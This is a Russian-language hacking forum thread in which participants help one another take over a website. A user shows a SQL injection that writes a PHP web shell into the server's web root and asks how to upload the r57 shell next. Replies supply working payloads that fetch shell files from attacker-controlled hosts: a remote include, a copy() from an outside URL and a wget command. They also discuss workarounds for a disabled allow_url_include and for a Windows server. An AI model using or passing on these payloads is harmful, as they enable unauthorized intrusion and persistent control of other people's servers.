26.06.2010, 23:42
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Залил shell , работает.
http://site.com/index.php?id=1+UNION+SELECT+1,'',2,3,4,5,6+into+ou tfile+'/data/web/www/shell.php'+--+
Как теперь залить r57shell.php , без загрузки формы?
|
|
|
26.06.2010, 23:43
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от 547
значит только лимитом,или прогой что куда проще...
я юзаю limit, но не все же таблицы наc интересуют ) дело 2 минут
|
|
|
|
26.06.2010, 23:45
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от FlaktW
Залил shell , работает.
http://site.com/index.php?id=1+UNION+SELECT+1,'',2,3,4,5,6+into+ou tfile+'/data/web/www/shell.php'+--+
Как теперь залить r57shell.php , без загрузки формы?
?v=include("yoursite.ru/r57.php"); (allow_url_include=On)
?v=copy($_GET,$_GET[d]);&s=http://yoursite.ru/shell.txt&d=/data/web/www/r57.php;
но это при eval, зачем system
PHP код:
[COLOR="#000000"]'[COLOR="#0000BB"][/COLOR]'[/COLOR]
|
|
|
|
27.06.2010, 00:12
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
Сообщение от FlaktW
Залил shell , работает.
http://site.com/index.php?id=1+UNION+SELECT+1,'',2,3,4,5,6+into+ou tfile+'/data/web/www/shell.php'+--+
Как теперь залить r57shell.php , без загрузки формы?
а почему сразу инклуд зделать нельзя?
|
|
|
|
27.06.2010, 00:14
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
С нами:
8718197
Репутация:
11
|
|
потому что там allow_url_include Off Off
|
|
|
|
27.06.2010, 00:16
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от 547
а почему сразу инклуд зделать нельзя?
а если Allow_url_include=Off??
написал выше...
|
|
|
|
27.06.2010, 00:20
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
Сообщение от Konqi
а если
Allow_url_include=
Off
??
написал выше...
тогда
?cmd=wget http://site.ru/shell.php
|
|
|
|
27.06.2010, 00:23
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от 547
тогда
?cmd=wget http://site.ru/shell.php
это уже другое дело, но нету гарантии что на сервере установлен wget )
зачем затруднять все (((
copy($source, $destination);
|
|
|
|
27.06.2010, 00:24
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
С нами:
8718197
Репутация:
11
|
|
Сообщение от 547
тогда
?cmd=wget http://site.ru/shell.php
там винда, вгет не пашет..
Konqi хорошо написал, грузи через ?v=copy($_GET,$_GET[d]);&s=http://yoursite.ru/shell.txt&d=/data/web/www/r57.php
|
|
|
|
27.06.2010, 00:29
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
кстати
'' евал вроде в винде непашет так что систем юзать наверное надо...
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
